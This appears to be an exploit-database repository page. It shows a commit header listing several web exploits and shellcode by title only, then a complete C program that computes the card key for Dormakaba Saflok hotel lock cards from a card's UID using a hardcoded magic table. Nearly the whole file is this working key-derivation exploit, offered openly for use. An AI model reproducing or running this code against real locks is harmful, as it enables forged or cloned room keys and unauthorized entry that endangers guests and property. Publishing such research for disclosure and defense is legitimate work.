59f10b7f45
13 changes to exploits/shellcodes/ghdb Saflok - Key Derication Function Exploit (shellcode) Linux-x64 - create a shell with execve() sending argument using XOR (/bin//sh) [55 bytes] Academy LMS 6.2 - Reflected XSS Blood Bank v1.0 - Multiple SQL Injection Moodle 4.3 - Reflected XSS TASKHUB-2.8.8 - XSS-Reflected WordPress Plugin Admin Bar & Dashboard Access Control Version: 1.2.8 - _Dashboard Redirect_ field Stored Cross-Site Scripting (XSS) WP Fastest Cache 1.2.2 - Unauthenticated SQL Injection WP Rocket < 2.10.3 - Local File Inclusion (LFI)
63 lines
No EOL
2.7 KiB
C
63 lines
No EOL
2.7 KiB
C
// Exploit Title: Saflok KDF
|
|
// Date: 2023-10-29
|
|
// Exploit Author: a51199deefa2c2520cea24f746d899ce
|
|
// Vendor Homepage: https://www.dormakaba.com/
|
|
// Version: System 6000
|
|
// Tested on: Dormakaba Saflok cards
|
|
// CVE: N/A
|
|
|
|
#include <stdio.h>
|
|
#include <stdint.h>
|
|
|
|
#define MAGIC_TABLE_SIZE 192
|
|
#define KEY_LENGTH 6
|
|
#define UID_LENGTH 4
|
|
|
|
int main(int argc, char *argv[]) {
|
|
if (argc != 2) {
|
|
printf("Usage: %s <32-bit uid value in hexadecimal format>\n", argv[0]);
|
|
return 1;
|
|
}
|
|
|
|
uint8_t magic_table[MAGIC_TABLE_SIZE] = {
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xF0, 0x57, 0xB3, 0x9E, 0xE3, 0xD8,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x96, 0x9D, 0x95, 0x4A, 0xC1, 0x57,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x43, 0x58, 0x0D, 0x2C, 0x9D,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFF, 0xCC, 0xE0, 0x05, 0x0C, 0x43,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x34, 0x1B, 0x15, 0xA6, 0x90, 0xCC,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x89, 0x58, 0x56, 0x12, 0xE7, 0x1B,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xBB, 0x74, 0xB0, 0x95, 0x36, 0x58,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xFB, 0x97, 0xF8, 0x4B, 0x5B, 0x74,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xC9, 0xD1, 0x88, 0x35, 0x9F, 0x92,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x8F, 0x92, 0xE9, 0x7F, 0x58, 0x97,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x16, 0x6C, 0xA2, 0xB0, 0x9F, 0xD1,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x27, 0xDD, 0x93, 0x10, 0x1C, 0x6C,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0xDA, 0x3E, 0x3F, 0xD6, 0x49, 0xDD,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x58, 0xDD, 0xED, 0x07, 0x8E, 0x3E,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x5C, 0xD0, 0x05, 0xCF, 0xD9, 0x07,
|
|
0x00, 0x00, 0xAA, 0x00, 0x00, 0x00, 0x11, 0x8D, 0xD0, 0x01, 0x87, 0xD0
|
|
};
|
|
|
|
uint8_t uid[UID_LENGTH];
|
|
sscanf(argv[1], "%2hhx%2hhx%2hhx%2hhx", &uid[0], &uid[1], &uid[2], &uid[3]);
|
|
|
|
uint8_t magic_byte = (uid[3] >> 4) + (uid[2] >> 4) + (uid[0] & 0x0F);
|
|
uint8_t magickal_index = (magic_byte & 0x0F) * 12 + 11;
|
|
|
|
uint8_t key[KEY_LENGTH] = {magic_byte, uid[0], uid[1], uid[2], uid[3], magic_byte};
|
|
uint8_t carry_sum = 0;
|
|
|
|
for (int i = KEY_LENGTH - 1; i >= 0 && magickal_index >= 0; i--, magickal_index--) {
|
|
uint16_t keysum = key[i] + magic_table[magickal_index];
|
|
key[i] = (keysum & 0xFF) + carry_sum;
|
|
carry_sum = keysum >> 8;
|
|
}
|
|
|
|
printf("Generated Key: ");
|
|
for (int i = 0; i < KEY_LENGTH; i++) {
|
|
printf("%02X", key[i]);
|
|
}
|
|
printf("\n");
|
|
|
|
return 0;
|
|
} |